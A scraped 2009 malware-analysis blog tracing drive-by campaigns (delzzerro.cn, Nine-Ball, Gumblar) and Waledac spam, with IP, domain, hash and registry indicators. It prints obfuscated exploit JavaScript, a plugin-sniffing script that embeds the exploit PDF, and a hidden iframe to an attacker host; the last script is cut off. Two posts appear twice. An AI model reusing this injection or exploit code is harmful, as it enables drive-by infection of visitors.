IP/Domain Analysis
IP address 91.212.198.37 is registered to (AS49314 NEVAL PE Nevedomskiy Alexey Alexeevich, Russia). The 91.212.198.0/24 netblock has been associated with various forms of cyber criminal activity.
inetnum: 91.212.198.0 - 91.212.198.255
netname: NEVAL
descr: Individual retailer Nevedomskiy A A
country: RU
org: ORG-IrNA1-RIPE
admin-c: NAA21-RIPE
tech-c: NAA21-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: NEVAL-mnt
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: NEVAL-mnt
mnt-domains: NEVAL-mnt
source: RIPE # Filtered
organisation: ORG-IrNA1-RIPE
org-name: Individual retailer Nevedomskiy Alexey Alexeevich
abuse-mailbox: mailto:abuse.lirkz@gmail.com
org-type: OTHER
address: Russian Federation
mnt-ref: NEVAL-mnt
mnt-by: NEVAL-mnt
source: RIPE # Filtered
The IP 91.212.198.37 currently maps to the following domains.
• *.delzzerro.cn
• delzzerro.cn
• updatedate.cn
• www.delzzerro.cn
The domain delzzerro.cn was registered on 17 July 2009.
Domain Name: delzzerro.cn
ROID: 20090717s10001s59929740-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司 (translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-17 02:17
Expiration Date: 2010-07-17 02:17
The domain updatedate.cn was registered on 8 July 2009.
Domain Name: updatedate.cn
ROID: 20090708s10001s08910501-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司(translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-08 01:51
Expiration Date: 2010-07-08 01:51
The following websites provide historical malicious activity for AS49314, 91.212.198.0/24.
https://zeustracker.abuse.ch/monitor.php?as=49314
http://maliciousnetworks.org/ipinfo.php?as=AS49314&date=2009-07-22
http://www.malwaredomainlist.com/mdl.php?search=49314&colsearch=All&quantity=50 http://www.malwareurl.com/search.php?domain=&s=AS49314&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on
www.delzzerro.cn Analysis
The HTTP request for www.delzzerro.cn returns and iframe and script redirect.
<html>
<head><title>400</title></head>
<body>
<iframe go='400' width=1 src='/pic/p2.php' error='600' height="1"></iframe>
<div id="divid">
<script src='/pic/vq.png'></script>
</body>
</html>
http://www.delzzerro.cn/pic/p2.php
The request for p2.php returns a PDF file.
GET /pic/p2.php HTTP/1.1
Referer: http://www.delzzerro.cn/
Host: www.delzzerro.cn Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Disposition: inline; filename=36.pdf
Content-Type: application/pdf
36.pdf
File: 36.pdf
Size: 27243
MD5: FDCF2B9803F7EF55C9C90BFA7627C0E9
The file 36.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.
• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927
http://www.delzzerro.cn/pic/vq.png
The vq.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).
http://delzzerro.cn/pic/uzp.php
The payload of the collective exploits is a GET request for uzp.php which returns the binary file installb.exe.
GET /pic/uzp.php
Host: delzzerro.cn
HTTP/1.1 200 OK
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream
http://91.212.198.37 Analysis
The HTTP request for 91.212.198.37 returns and iframe, script redirect and exploit code.
<html>
<head><title>404</title></head>
<body>
<iframe g='22' width=1 src='/img/p2.php' l='66' height="1"></iframe>
<script>
fg="%u2121%..;var .%u212.DE%u.1%u.%u.navigat.retVal.ibkka.var ..DE.=..return .5.C9E2.C9.0..C9.u..71.21.functio.A22.29.';.U+.+'.
......TRUNCATED......
split('.');for(J=u.length-1;J>-1;J--)Q[U]=Q[U].split(o[J]).join(u[J]);i8+=Q[U].replace(/./g,'"').replace(/./g,"\\").replace(/./g,"\n")}eval(i8);
</script>
<div id="divid">
<script src='/img/vw.png'></script>
</body>
</html>
http://91.212.198.37/img/p2.php
The request for p2.php returns a PDF file.
GET /img/p2.php
Referer: http://91.212.198.37/
Host: 91.212.198.37
HTTP/1.1 200 OK
Content-Disposition: inline; filename=119.pdf
Content-Type: application/pdf
119.pdf
File: 119.pdf
Size: 27360
MD5: 26A360E37812E6D5CCF31ED06CE692D9
The file 119.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.
• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927
http://91.212.198.37/img/vw.png
The vw.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).
updatedate.cn/img/uzt.php
The payload of the collective exploits is a GET request for uzt.php which returns the binary file installb.exe.
GET /img/uzt.php
Host: updatedate.cn
HTTP/1.1 200
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream
Malware Analysis
installb.exe
The malware installb.exe creates:
• Trojan.Virantix.C (Symantec) which attempts to lower system security settings, kill the process of antivirus applications and install rogue security products.
• PWS:Win32/Daurso (Microsoft) serves as an infostealer that keylogs and exfiltrates user accounts and passwords.
File: installb.exe
Size: 113664
MD5: D9A878871B90C68F4A1A155A3015A8FE
ThreatExpert
VirusTotal (4/41 current detection)
The malware installb.exe creates the following files:
C:\DOCUME~1\%user%\LOCALS~1\Temp\installb[1].exe
File: installb[1].exe
Size: 48128
MD5: 9145DA932AAB97CF50B5DE8DCDF80BE9
C:\WINDOWS\system32\braviax.exe
File: braviax.exe
Size: 11264
MD5: 61FEBE4C32CE9CB0DFCF55D373E0BAFD
VirusTotal (17/41 current detection)
C:\WINDOWS\system32\dllcache\figaro.sys (is later deleted)
C:\WINDOWS\drivers\beep.sys
C:\WINDOWS\system32\dllcache\beep.sys
File: beep.sys
Size: 32768
MD5: B040B5812B6668A232B18D397F721741
VirusTotal (20/38 current detection)
C:\WINDOWS\system32\Wbem\proquota.exe
File: proquota.exe
Size: 35840
MD5: 348BA619AAB3A92B99701335F95FE2A7
ThreatExpert
VirusTotal (5/41 current detection)
proquota.exe (PWS:Win32/Daurso)
The malware proquota.exe (PWS:Win32/Daurso) connects to squatead.com (212.150184.146, AS8584 Barak Netvision 013 Barak – Network, Israel).
POST /ptf/receiver/online HTTP/1.1
Host: squatead.com
The malware proquota.exe monitored and exfiltrated FTP credentials to squatead.com during dynamic analysis.
POST /ptf/receiver/ftp HTTP/1.1
Host: squatead.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Content-Length: 92
ftp_uri_0=p7uojZW2GGxfm637v7nEye4CbV7Y5%2FKP6Y6It1wqCsfk%2BeHqgYCrXA&ftp_source_0=lb250dzwDg
Trojan.Virantix.C
The Trojan.Virantix.C malware connects to komalinovskatas.com (66.79.178.199, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) in order to download the installer for the rogue security product Home Antivirus 2010. The domain komalinovskatas.com was registered on 2009/7/20.
Registrant:
Aleksandr Petrov mailto:radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003
Domain Name:komalinovskatas.com
Record last updated at 2009-07-23 10:32:26
Record created on 2009/7/20
Record expired on 2010/7/20
Home Antivirus 2010 installer download.
GET /?wmid=1025&d=2&it=2&s=24 HTTP/1.1
Host: komalinovskatas.com
HTTP/1.1 302 Found
Location: /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2
GET /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2 HTTP/1.1
Host: komalinovskatas.com
HTTP/1.1 200 OK
Content-Disposition: attachment; filename="Install.exe";
The malware install.exe is written as c:\WINDOWS\system32\wisdstr.exe.
File: wisdstr.exe
Size: 181488
MD5: E68A91A3614435882DAAD5494CAE622E
ThreatExpert
The malware wisdstr.exe connects to bureltanovaderta.com (66.79.178.200, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) to download the remaining installation files associated with the rogue security product Home Antivirus 2010. The product provides false diagnostics and persistent notifications in an attempt to convince the victim to purchase a licensed version of the product.
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAdd.cab HTTP/1.1
GET /files/HomeAntivirus2010/BinariesGUI.cab HTTP/1.1
GET /files/BinariesSC.cab HTTP/1.1
GET /files/BinariesUpd.cab HTTP/1.1
GET / HTTP/1.1
GET /update_inst.php?wmid=1025&subid=b4eaa65e579e83c2248376cc88de9086&pid=2&lid=0&hs=F35A291E6CA636316E72ECAD75594619 HTTP/1.1
The domain bureltanovaderta.com is registered nearly identical to komalinovskatas.com.
Registrant:
Aleksandr Petrov radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003
Domain Name:bureltanovaderta.com
Record last updated at 2009-07-24 10:06:32
Record created on 2009/7/20
Record expired on 2010/7/20
An over-sized Windows Security center opens indicating Virus Protection is not found. The window is part of the social; engineering effort to convince victims to purchase a licensed version of Home Antivirus 2010.
The malware also attempted C2 connections to cbbugltjud.com (195.2.253.240, AS12695 MADET-NET Moscow, Russia) to download additional malware. Other domains that resolve to 195.2.253.240 include:
*.cabkyykbbg.com
*.cbbugltjud.com
cabkyykbbg.com
cbbugltjud.com
www.cabkyykbbg.com
www.cbbugltjud.com
GET /progs/xfcgtyylqd/iejwn
Host: cbbugltjud.com
The iejwn download creates c:\alurm.exe.
File: alurm.exe
Size: 11264
MD5: 6BE4585C480B5C840E99BE9B190F7846
ThreatExpert
GET /progs/xfcgtyylqd/ziwwofwj.php
Host: cbbugltjud.com
GET /progs/xfcgtyylqd/czaarfj.php?adv=adv464
Host: cbbugltjud.com
Sunday, July 26, 2009
Tuesday, July 21, 2009
Erin Andrews Peepshow Gone Bad?
This summary is not available. Please
click here to view the post.
Labels:
Alueron,
codec,
Erin Andrews,
FlashCodecPlugin.exe,
MediaPlayer.exe
Wednesday, July 8, 2009
Waledac - July 4th Wave
Keeping up with theme-based spam, Waledac began a new wave for the 4th of July. Shadowserver posted a list of 4th of July themed domains like the following:
fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com
The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:
112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23
sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.
Malware Analysis
File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E
The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe
The following are samples of initial connections to various Waledac controllers.
POST /rbbcrx.png
Host: 119.77.219.219
POST /lbohwj.png
Host: 98.25.97.68
POST / HTTP/1.1
Host: 93.100.114.158
POST /xdryoc.htm
Host: 134.155.241.188
POST /mzrbflwkczf.png
Host: 93.100.114.158
fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com
The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:
112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23
sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.
Malware Analysis
File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E
The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe
The following are samples of initial connections to various Waledac controllers.
POST /rbbcrx.png
Host: 119.77.219.219
POST /lbohwj.png
Host: 98.25.97.68
POST / HTTP/1.1
Host: 93.100.114.158
POST /xdryoc.htm
Host: 134.155.241.188
POST /mzrbflwkczf.png
Host: 93.100.114.158
Friday, June 19, 2009
Nine-Ball Analysis
On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:
rnw.kz > bro.tw > rmi.tw > ninetoraq.in
Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.
The following is sample redirect/exploit path followed from the base redirect rnw.kz/index.php
Exploit Analysis
http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php
All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)
The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.
The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.
The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.
File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9
The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.
/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')
The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.
• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)
All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.
Malware Analysis
The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.
ThreatExpert
VirusTotal
File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A
The malware load.exe creates the following file and registry entries.
c:\WINDOWS\system32\mscorewr.dll
File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:
Domain/IP Analysis
The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.
bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw
The below table lists domain registration data for the domains hosted at 91.212.65.133:
Domain Registration Provider Registration Date Registrant Country
mias.tw WebCC Ltd. 2009-06-15 RU
bmt.tw WebCC Ltd. 2009-05-17 RU
bro.tw WebCC Ltd. 2009-06-03 RU
molo.tw WebCC Ltd. 2009-06-09 RU
orep.tw WebCC Ltd. 2009-06-15 RU
rmi.tw WebCC Ltd. 2009-06-12 RU
sovi.tw WebCC Ltd. 2009-06-12 RU
rnw.kz SKILLTEX 2009-05-18 RU
Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.
http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)
On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...
rnw.kz > bro.tw > rmi.tw > ninetoraq.in
Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.
The following is sample redirect/exploit path followed from the base redirect rnw.kz/index.php
Exploit Analysis
http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php
All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)
The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.
The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.
function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq
++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
}
}
}
}
catch (e){
}
if (Qqz8W8MiQQlAc){
document.write(
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
}
else return false;
}
setTimeout("FVEopW91F0QKb();", 500);
The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.
File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9
The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.
/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')
The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.
• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)
All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.
Malware Analysis
The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.
ThreatExpert
VirusTotal
File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A
The malware load.exe creates the following file and registry entries.
c:\WINDOWS\system32\mscorewr.dll
File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:
Domain/IP Analysis
The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.
bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw
The below table lists domain registration data for the domains hosted at 91.212.65.133:
Domain Registration Provider Registration Date Registrant Country
mias.tw WebCC Ltd. 2009-06-15 RU
bmt.tw WebCC Ltd. 2009-05-17 RU
bro.tw WebCC Ltd. 2009-06-03 RU
molo.tw WebCC Ltd. 2009-06-09 RU
orep.tw WebCC Ltd. 2009-06-15 RU
rmi.tw WebCC Ltd. 2009-06-12 RU
sovi.tw WebCC Ltd. 2009-06-12 RU
rnw.kz SKILLTEX 2009-05-18 RU
Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.
http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)
On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...
Thursday, June 11, 2009
Gumblar Analysis
So it seems Gumblar is the latest threat to receive continual media hype. It was nice to see Symantec's opinion that this is just another day in the life of the web. Recent "threats" like Conficker and Gumblar seem to benefit security vendors and consultants who feed the hype for business purposes. The term Gumblar is an adopted term that describes a recent web-based drive-by attack. The attack follows the standard web-based drive-by attack TTP:
Gumbar Exploit Analysis
The USDA Forest Service website (http://www.fs.fed.us) was a vicitm of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia).
<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The lotmachinesguide.cn/in.cgi?income56 request returned a HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code.
http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf
The first 2 sections of exploit code target the Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (not sure specific one).The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe.
http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5
http://liteautogreatest.cn/index.php Code
<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9